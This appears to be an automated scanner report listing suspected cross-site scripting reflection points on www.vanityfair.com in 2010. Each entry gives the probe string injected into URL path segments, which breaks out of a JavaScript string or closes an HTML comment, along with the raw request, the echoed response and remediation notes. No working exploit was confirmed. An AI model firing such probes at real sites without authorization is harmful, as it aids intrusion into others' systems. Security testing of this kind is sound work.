HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:58:58 GMT Date: Mon, 29 Nov 2010 16:48:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 47522
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... use bug: com.amg.condenet.commons.exceptions.ApplicationBug: -:[2122140165]:- Thread id: 39. Cause: java.lang.IllegalArgumentException. Msg: Invalid uri 'http://blog.vanityfair.com/online/daily/2010/11bed10-->dd76bfd9213/wikileaks-blind-items.html?proxyuri=online%2Fdaily%2F2010%2F11bed10--%3Edd76bfd9213%2Fwikileaks-blind-items.html': escaped absolute path not valid. -> ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f03e7'%3b41c73998712 was submitted in the REST URL parameter 5. This input was echoed as f03e7';41c73998712 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/daily/2010/11/wikileaks-blind-items.htmlf03e7'%3b41c73998712 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:09 GMT Date: Mon, 29 Nov 2010 16:49:09 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44634
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/daily/2010/11/wikileaks-blind-items.htmlf03e7';41c73998712', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.", keywords : "Vanity ...[SNIP]...
The value of REST URL parameter 5 is copied into an HTML comment. The payload 79a4d-->1922f4d4f3a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/daily/2010/11/wikileaks-blind-items.html79a4d-->1922f4d4f3a HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:11 GMT Date: Mon, 29 Nov 2010 16:49:11 GMT Connection: close Connection: Transfer-Encoding Content-Length: 47520
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a562a'%3b4d70b756bee was submitted in the REST URL parameter 3. This input was echoed as a562a';4d70b756bee in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/daily/arta562a'%3b4d70b756bee HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:22 GMT Date: Mon, 29 Nov 2010 16:49:22 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44604
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/daily/arta562a';4d70b756bee', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.", keywords : "Vanity ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload d8789-->b5e6fcae1be was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/daily/artd8789-->b5e6fcae1be HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:24 GMT Date: Mon, 29 Nov 2010 16:49:24 GMT Connection: close Connection: Transfer-Encoding Content-Length: 47184
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload 884ea-->5885a371fc9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/daily/books884ea-->5885a371fc9 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:28 GMT Date: Mon, 29 Nov 2010 16:49:28 GMT Connection: close Connection: Transfer-Encoding Content-Length: 47204
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... Cause bug: com.amg.condenet.commons.exceptions.ApplicationBug: -:[1422440510]:- Thread id: 39. Cause: java.lang.IllegalArgumentException. Msg: Invalid uri 'http://blog.vanityfair.com/online/daily/books884ea-->5885a371fc9/?proxyuri=online%2Fdaily%2Fbooks884ea--%3E5885a371fc9%2F': escaped absolute path not valid. -> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10016'%3b322ae6fcf7a was submitted in the REST URL parameter 3. This input was echoed as 10016';322ae6fcf7a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/daily/books10016'%3b322ae6fcf7a HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:25 GMT Date: Mon, 29 Nov 2010 16:49:25 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44608
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/daily/books10016';322ae6fcf7a', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.", keywords : "Vanity ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload b90dd-->0cfc0469b67 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/daily/giftsb90dd-->0cfc0469b67 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:22 GMT Date: Mon, 29 Nov 2010 16:49:22 GMT Connection: close Connection: Transfer-Encoding Content-Length: 47204
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f77cf'%3b54b70297d3f was submitted in the REST URL parameter 3. This input was echoed as f77cf';54b70297d3f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/daily/giftsf77cf'%3b54b70297d3f HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:20 GMT Date: Mon, 29 Nov 2010 16:49:20 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44606
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/daily/giftsf77cf';54b70297d3f', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.", keywords : "Vanity ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 865c7-->b80412361fb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/daily/gossip-pack865c7-->b80412361fb HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:25 GMT Date: Mon, 29 Nov 2010 16:49:25 GMT Connection: close Connection: Transfer-Encoding Content-Length: 47270
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29aaa'%3b1827f640979 was submitted in the REST URL parameter 3. This input was echoed as 29aaa';1827f640979 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/daily/gossip-pack29aaa'%3b1827f640979 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:23 GMT Date: Mon, 29 Nov 2010 16:49:23 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44614
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/daily/gossip-pack29aaa';1827f640979', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.", keywords : "Vanity ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0502'%3b53abf324fa8 was submitted in the REST URL parameter 3. This input was echoed as e0502';53abf324fa8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/oscars/2010e0502'%3b53abf324fa8/10/irvin-kershner.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:26 GMT Date: Mon, 29 Nov 2010 16:49:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44630
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/oscars/2010e0502';53abf324fa8/10/irvin-kershner.html', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.",
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1003'%3bea1c7fe5ea5 was submitted in the REST URL parameter 4. This input was echoed as e1003';ea1c7fe5ea5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/oscars/2010/10e1003'%3bea1c7fe5ea5/irvin-kershner.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:40 GMT Date: Mon, 29 Nov 2010 16:49:40 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44628
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/oscars/2010/10e1003';ea1c7fe5ea5/irvin-kershner.html', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.", ke ...[SNIP]...
